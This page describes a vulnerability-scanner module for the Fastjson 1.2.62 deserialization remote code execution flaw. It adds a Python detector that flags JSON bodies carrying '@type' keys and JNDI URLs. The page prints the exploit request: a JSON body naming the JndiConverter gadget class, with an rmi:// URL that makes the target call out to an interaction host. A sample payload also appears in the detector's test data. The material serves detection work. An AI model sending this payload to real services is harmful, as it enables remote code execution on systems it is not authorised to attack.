Fastjson 1.2.62 - Remote Code Execution

By kannthu

Critical
Vidoc Module
#fastjson #rce #deserialization #oast
Description

What is "Fastjson 1.2.62 - Remote Code Execution"?

The "Fastjson 1.2.62 - Remote Code Execution" module is designed to detect a vulnerability in the Fastjson 1.2.62 software. Fastjson is a Java library for parsing and generating JSON data. This module specifically targets a deserialization remote code execution vulnerability in Fastjson 1.2.62.

This vulnerability is classified as CWE-77 and has a severity level of critical. It allows an attacker to execute arbitrary code remotely, potentially leading to unauthorized access, data breaches, or system compromise.

This module was authored by zh.

Impact

The impact of the "Fastjson 1.2.62 - Remote Code Execution" vulnerability can be severe. By exploiting this vulnerability, an attacker can execute arbitrary code on the target system. This can lead to various consequences, including unauthorized access, data manipulation, and complete compromise of the affected system.

How does the module work?

The "Fastjson 1.2.62 - Remote Code Execution" module works by sending a specific HTTP request to the target system. The request is designed to trigger the deserialization vulnerability in Fastjson 1.2.62. Upon successful exploitation, the attacker can execute arbitrary code on the target system.

Here is an example of the HTTP request used by the module:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
   "@type":"org.apache.xbean.propertyeditor.JndiConverter",
   "AsText":"rmi://<InteractionURL>/exploit"
}

The module also includes matching conditions to determine if the vulnerability is present. As listed in the module preview, it matches the word "dns" and a status code that is not 200. If both conditions are met, the module reports the vulnerability.

It is important to note that this module is specifically designed for detecting the vulnerability and does not perform any remediation or mitigation actions.
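To complement the module's active check, the following added example (not part of the Vidoc module or of Fastjson) inspects captured JSON request bodies for the shape shown in the request above: an object carrying an "@type" key, optionally alongside a string value with a JNDI URL scheme. The function names, the scheme list, the class name com.example.Pref and the host collector.example.invalid are assumptions made for this example.

```python
import json

# Schemes that cause a JNDI lookup when a gadget class resolves the string.
JNDI_SCHEMES = {"rmi", "ldap", "ldaps", "dns", "iiop"}

def _is_jndi_url(value):
    scheme, sep, _ = value.partition("://")
    return bool(sep) and scheme.lower() in JNDI_SCHEMES

def _walk(node, path="$"):
    """Yield (path, obj) for every JSON object nested anywhere in node."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")

def inspect_body(body):
    """Return a list of findings for one JSON request body ([] = clean)."""
    try:
        doc = json.loads(body)  # decodes escaped key names before matching
    except ValueError:
        # A strict parser can reject input a lenient one accepts: report it.
        return [{"path": "$", "reason": "unparseable-json"}]
    findings = []
    for path, obj in _walk(doc):
        if "@type" not in obj:
            continue
        urls = [v for v in obj.values() if isinstance(v, str) and _is_jndi_url(v)]
        findings.append({
            "path": path,
            "class": obj["@type"],
            "reason": "autotype+jndi-url" if urls else "autotype",
            "urls": urls,
        })
    return findings

# Constructed sample bodies; the host name is a placeholder.
SAMPLES = [
    '{"@type":"org.apache.xbean.propertyeditor.JndiConverter",'
    '"AsText":"rmi://collector.example.invalid/exploit"}',
    '{"user":{"prefs":[{"\\u0040type":"com.example.Pref","theme":"dark"}]}}',
    '{"name":"alice","site":"https://example.org"}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body))
```

Findings with the reason "autotype+jndi-url" warrant the highest priority; plain "autotype" findings still merit review on endpoints that never expect a type hint from clients.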

For more information, you can refer to the GitHub repository related to this vulnerability.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dns
and
NOT status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability